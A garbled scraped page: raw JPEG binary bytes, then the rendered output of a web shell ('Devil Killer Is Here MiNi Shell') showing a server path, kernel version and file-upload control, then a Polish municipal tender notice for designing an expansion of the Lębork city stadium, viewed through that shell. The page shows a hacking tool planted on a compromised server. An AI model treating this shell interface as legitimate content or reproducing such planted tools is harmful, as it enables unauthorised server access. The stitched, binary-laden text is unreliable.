JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20230111/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20230111/0002431901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie dokumentacji projektowo-kosztorysowej rozbudowy Stadionu Miejskiego w Lęborku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Lębork</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979737</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lębork</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">598624280, 598637-753, 608 584 785</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">inwestycje@um.lebork.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.lebork.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dokumentacji projektowo-kosztorysowej rozbudowy Stadionu Miejskiego w Lęborku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1895f2f0-9198-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00024319</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lebork <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lebork</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Porozumiewanie się Zamawiającego z Wykonawcami odbywa się drogą elektroniczną przy użyciu Platformy Zakupowej (PZ)Urzędu Miasta Lębork https://platformazakupowa.pl/pn/lebork. Istnieje możliwość kierowania zapytania za pomocą środków komunikacji elektronicznej– e-mail: inwestycje@um.lebork.pl-z zastrzeż. wymogów odnośnie poszczególnych oświadczeń i dokumentów określonych w niniejszej SWZ. 2.Zaleca się aby Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zam. publicznego,posiadał konto na PZ Urzędu Miasta Lębork. 3.Wymagania techn. i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu,opisane zostały w regulaminie korzystania z PZ dostępnym pod adresem https://platformazakupowa.pl/strona/1-regulamin .4.Maksymalny rozmiar plików przesyłanych za pośrednictwem PZ wynosi 150MB. 5.Za datę przekazania oferty, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na PZ. 6.Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email:inwestycje@um.lebork.pl. 7.Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem PZ jako załączniki. Sposób sporządzania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. (Dz. U. z 2020 r., poz. 2452). 8.Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ. 9.Uprawnionym przez Zamawiającego do kontaktów z Wykonawcami jest mgr inż. Romuald Babul – Nacz Wydz Realizacji Inwestycji w siedzibie Zamawiającego, tel. 598637753,tel.kom.608584785.10.Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Zamawiający jest zobowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert, pod warunkiem, że wniosek o wyjaśnienie treści SWZ wpłynie do Zamawiającego nie później niż na 4 dni przed upływem terminu składania ofert. Ewentualne przedłużenie terminu składania ofert nie wpływa na bieg terminu składania wniosków o wyjaśnienie treści SWZ. 11.Jeżeli wniosek o wyjaśnienie treści SWZ wpłynął po upływie terminu, o którym mowa w pkt 10. Zamawiający nie ma obowiązku udzielania wyjaśnień SWZ oraz obowiązku przedłużenia terminu składania ofert.12.Treść zapytań wraz z wyjaśnieniami Zamawiający udostępnia, bez ujawniania źródła zapytania na stronie internetowej prowadzonego postępowania. 13.W uzasadnionych przypadkach Zamawiający może przed upływem terminu składania ofert zmienić treść SWZ. 14.W przypadku gdy zmiana treści SWZ jest istotna dla sporządzenia oferty lub wymaga od wykonawców dodatkowego czasu na zapoznanie się ze zmianą treści SWZ i przygotowanie ofert, zamawiający przedłuża termin składania ofert o czas niezbędny na ich przygotowanie. Zamawiający informuje wykonawców o przedłużonym terminie składania ofert przez zamieszczenie informacji na stronie internetowej prowadzonego postępowania, na której została udostępniona SWZ. 15.Dokonaną zmianę treści SWZ Zamawiający udostępnia na stronie internetowej prowadzonego postępowania. 16.Zamawiający może zmienić ogłoszenie, zamieszczając w Biuletynie Zamówień Publicznych ogłoszenie o zmianie ogłoszenia. 17.W przypadku dokonywania zmiany treści ogłoszenia o zamówieniu, zamawiający przedłuża termin składania ofert o czas niezbędny do wprowadzenia zmian w ofertach, jeżeli jest to konieczne. 18.Zamawiający oświadcza, że nie będzie organizował zebrania informacyjnego w celu wyjaśnienia treści SWZ dla przyszłych Wykonawców.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych ) (Dz. Urz. UE L 119 z 04.05.2016 r., str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>1.1.administratorem danych osobowych jest Urząd Miejski w Lęborku, ul. Armii Krajowej 14, 84 300 Lębork, tel. 59 8624 280; <br/>1.2.inspektorem ochrony danych osobowych w Urzędzie Miejskim w Lęborku jest pani Bożena Steciuk, e-mail: iod@um.lebork.pl, tel. 59 8637 733; <br/>1.3.dane osobowe przekazane przez Wykonawcę przetwarzane będą na podstawie art. 6 ust. 1 lit c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego na Wykonanie dokumentacji projektowo-kosztorysowej rozbudowy Stadionu Miejskiego w Lęborku, prowadzonym w trybie podstawowym bez przeprowadzenia negocjacji na podst.art.275 pkt.1. <br/>1.4.odbiorcami danych osobowych przekazanych przez Wykonawcę będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2018 r. poz. 1986, 2215, z 2019 r. poz. 53.), dalej Ustawa Pzp; <br/>1.5.dane osobowe przekazane przez Wykonawcę będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia; <br/>1.6.obowiązek podania przez Wykonawcę danych osobowych bezpośrednio dotyczących Wykonawcy jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>1.7.w odniesieniu do danych osobowych przekazanych przez Wykonawcę decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO; <br/>1.8.Wykonawca posiada: <br/>1.8.1.na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>1.8.2.na podstawie art. 16 RODO prawo do sprostowania danych osobowych Wykonawcy; <br/>1.8.3.na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>1.8.4.prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie danych osobowych dotyczących Wykonawcy narusza przepisy RODO; <br/>1.9.Wykonawcy nie przysługuje: <br/>1.9.1.w związku z art. 17 ust. 3 lit. b d lub e RODO prawo do usunięcia danych osobowych; <br/>1.9.2.prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.Z.2023.G</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 155988,86 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-kosztorysowej dla zadania: Rozbudowa Stadionu Miejskiego w Lęborku poprzez budowę budynku zaplecza z trybunami na ok. 950 osób, z zadaszeniem oraz niezbędną infrastrukturą.<br/>2.	Zakres zamówienia obejmować będzie :<br/>2.1.Poglądowe rozmieszczenie oczekiwanego zakresu projektu pokazane jest na Załączniku nr 10 Do SWZ<br/>2.2.Nowy budynek stadionu – funkcje:<br/>2.2.1.Zaplecze sanitarne dla całego obiektu sportowego z dostępem od zewnątrz (dla kibiców i użytkowników obiektu- kobiety, mężczyźni, osoby niepełnosprawne)<br/>2.2.2.	Piwnica:<br/>a)	Garaże dla pojazdów obsługujących obiekt z dostępem od zewnątrz <br/>b)	Pomieszczenia magazynowe przeznaczone na potrzeby Centrum Sportu i Rekreacji (CSiR),<br/>c)	2 pomieszczenia dla pracowników obsługi z zapleczem sanitarnym<br/>d)	Pomieszczenie techniczne na sprzęt nagłaśniający<br/>e)	2 małe szatnie z zapleczem sanitarnym<br/>2.2.3.	Parter:<br/>a)	4 duże szatnie min. 30 m2 oraz zaplecze sanitarne dla każdej szatni oraz 4 pomieszczenia niedaleko każdej szatni po ok. 14-16 m2 każde<br/>b)	2 szatnie dla sędziów z zapleczem sanitarnym<br/>c)	2 pomieszczenia dla opieki medycznej<br/><br/>2.2.4.	I piętro:<br/>a)	8 pomieszczeń biurowych na potrzeby CSiR (pomieszczenia klimatyzowane, w tym serwerownia) <br/>b)	Pomieszczenie socjalne dla pracowników<br/>c)	Sala konferencyjna min. 40 m2<br/>d)	Toalety<br/>e)	Pomieszczenie dla obserwatora i delegata<br/>f)	Sala prasowa<br/>g)	Loża VIP<br/>2.2.5.	Obiekt powinien być dostępny dla osób niepełnosprawnych (winda)<br/>2.3. Trybuny:<br/>2.3.1.	Na bazie budynku (pkt. 2.2.)<br/>2.3.2.	Ilość miejsc ok. 950<br/>2.3.3.	Zadaszenie<br/>2.3.4.	Zaplecze socjalne<br/>2.4. Oświetlenie płyt boiska<br/>2.5.	Monitoring całego stadionu<br/>2.6. Punkt kasowy, depozyt oraz wysokie kołowrotki przy wejściu na stadion<br/>2.7. Portiernia/ dyżurka firmy ochroniarskiej - do rozważenia<br/>2.8. Wymiennikownia c.o.<br/>2.9.	Drogi dojazdowe<br/>2.10.	Tablica wyników (na płytę główna i boczną)<br/>2.11. Dokumentacja powinna zawierać również:<br/>2.11.1.	Projekty niezbędnych instalacji: elektrycznych, teletechnicznych (internet), słaboprądowych, sanitarnych w zakresie instalacji wodno – kanalizacyjnych, c. o., wentylacji, klimatyzacji, ppoż, instalacja odgromowa<br/>2.11.2.	Instrukcję bezpieczeństwa pożarowego<br/>2.11.3.	Projekt aranżacji wnętrz wszystkich pomieszczeń (z uwzględnieniem materiałów wykończeniowych, rozmieszczenie elektroinstalacji tj. gniazd, łączników, punków świetlnych, stolarki drzwiowej, sanitariatów, armatury, mebli)<br/>2.11.4.	Projekt rozbiórki lub przebudowy istniejących obiektów budowlanych, które wejdą w konflikt z projektowaną drogą jeśli będzie to wymagane,<br/>2.11.5.	Rozwiązania projektowe dla wszystkich kolizji (Zamawiający nie uzyskiwał warunków przebudowy kolidującej infrastruktury)<br/>2.12.	Wykonawca zleci we własnym zakresie opracowanie mapy do celów projektowych dla zadania. Kopię mapy należy przekazać Zamawiającemu;<br/>2.13.	Wykonawca wykona badania gruntowe w zakresie niezbędnym do realizacji zamówienia.<br/>2.14.	Dokumentacja powinna zostać uzgodniona z PZPN – dla III ligi<br/>2.15.	Należy uzyskać decyzje, opinie, sprawdzenia, warunki uzgodnienia i zatwierdzenia dokumentacji projektowej wymagane przepisami prawa, w tym uzgodnienia z zamawiającym, rzeczoznawcami p.poż., sanit.-hig., bhp, ochroną środowiska, uzgodnienie projektu z gestorami sieci i innych wymaganych do uzyskania pozwolenia na budowę<br/>3.	Realizacja zamówienia ma obejmować: <br/>3.1.	opracowanie projektu budowlanego w sposób zgodny z wymaganiami ustawy Prawo budowlane, ustaleniami określonymi w decyzjach administracyjnych dotyczących zamierzenia budowlanego, obowiązującymi przepisami oraz zasadami wiedzy technicznej oraz innych dokumentów niezbędnych do uzyskania pozwolenia na budowę – w 5 egz. (plus wersja elektroniczna w ogólnie dostępnym formacie .pdf i .dwg);<br/>3.2.	opracowanie dokumentacji projektowej zgodnie z Rozporządzeniem Ministra Rozwoju i Technologii z dnia 20.12.2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego obejmującej wykonanie:<br/>- projektu budowlanego w zakresie uwzględniającym specyfikę robót budowlanych – w 5 egz. (plus wersja elektroniczna w ogólnie dostępnym formacie .pdf i .dwg);<br/>- projektu wykonawczego w zakresie, o którym mowa w § 5 w/w Rozporządzenia -– w 4 egz. (plus wersja elektroniczna w ogólnie dostępnym formacie);<br/>3.3.	specyfikacji technicznej wykonania i odbioru robót budowlanych – w 4 egz. (plus wersja elektroniczna w ogólnie dostępnym formacie .pdf i .dwg);<br/>3.4.	przedmiaru robót w zakresie, o którym mowa w § 6 w/w Rozporządzenia – w 4 egz. (plus wersja elektroniczna w ogólnie dostępnym formacie .pdf i .dwg);<br/>3.5.	kosztorysu inwestorskiego – w 4 egz. (plus wersja elektroniczna w ogólnie dostępnym formacie);<br/>3.6.	informację dotyczącą bezpieczeństwa i ochrony zdrowia, w przypadkach gdy ich opracowanie jest wymagane - w 4 egzemplarzach (plus wersja elektroniczna w ogólnie dostępnym formacie). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <p class="mb-0">71244000-0 - Kalkulacja kosztów, monitoring kosztów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający przy wyborze najkorzystniejszej oferty posługiwać się będzie następującymi kryteriami: <br/>a. Kryterium „Cena oferty” (C) - waga kryterium 60% <br/>Przyjmuje się, że oferta z najniższą ceną otrzyma 60 pkt. <br/><br/> cena najniższa<br/>C = ----------------------------------------- x 60 pkt <br/> cena danego Wykonawcy <br/><br/>b. Kryterium „Okres rękojmi” – okres rękojmi za wady fizyczne i prawne dokumentacji – 40%.<br/><br/>Oceny kryterium R - okres rękojmi wymagany przez Zamawiającego w zakresie od 36 miesięcy do 78 miesięcy dokonuje się w następujący sposób: <br/>− oferta, w której przewidziano max (najdłuższy) okres otrzyma 40 punktów, z tym, że za najdłuższy okres Zamawiający przyjmuje max. 78 miesięcy (pełnych miesięcy). Jeżeli Wykonawca wskaże w ofercie okres rękojmi powyżej 78 miesięcy Zamawiający przyjmie do obliczeń wartość 78 miesięcy; <br/>− pozostałe oferty są punktowane liniowo wedle następującej formuły arytmetycznej: <br/><br/> (Xi – 36) <br/>R = ilość punktów = --------------------- * 40 pkt. <br/> (78 - 36) <br/>gdzie: <br/>Xi - ilość pełnych miesięcy rękojmi ocenianej oferty (nie mniej niż obowiązkowa 36 miesięcy i nie więcej niż max ilość 78 miesięcy). <br/><br/>UWAGA: <br/>Czas trwania okresu rękojmi należy określić w pełnych miesiącach, liczony od miesiąca następnego, w którym nastąpił odbiór końcowy przedmiotu zamówienia.<br/> W przypadku, gdy Wykonawca złoży ofertę, w której wskaże okres rękojmi poniżej 36 miesięcy, oferta będzie potraktowana jako niezgodna z treścią SWZ i zostanie odrzucona.<br/><br/>2.	Łączna punktacja oferty = suma punktów (C + R) <br/>gdzie: <br/>C – liczba punktów jaką może zdobyć oferta (Wykonawca) za kryterium „Cena” <br/>R – liczba punktów jaką może zdobyć oferta (Wykonawca) za kryterium „Okres rękojmi” <br/><br/>Maksymalna liczba punktów: 100 <br/><br/>3.	Oferta, która uzyska najwyższą łączną punktację, uważana jest za ofertę najwyżej ocenioną. <br/>4.	Maksymalna ilość punktów, jaką może zdobyć Wykonawca uwzględniając wszystkie kryteria oceny ofert wynosi 100 pkt. Za najwyżej ocenioną zostanie uznana oferta, która otrzyma najwyższą liczbę punktów. W przypadku równej ilości punktów za najwyżej ocenioną ofertę zostanie uznana oferta, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. <br/>5.	Brak wypełnienia przez Wykonawcę w formularzu oferty ceny lub innego kryterium oceny ofert spowoduje odrzucenie oferty, jako niezgodnej z treścią SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Zdolność techniczna lub zawodowa.<br/>Wykonawca wykaże, iż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej jedno zamówienie na wykonanie dokumentacji projektowej budowy/rozbudowy budynku stadionu piłkarskiego, na podstawie której uzyskano licencję PZPN dla klubu III ligi lub 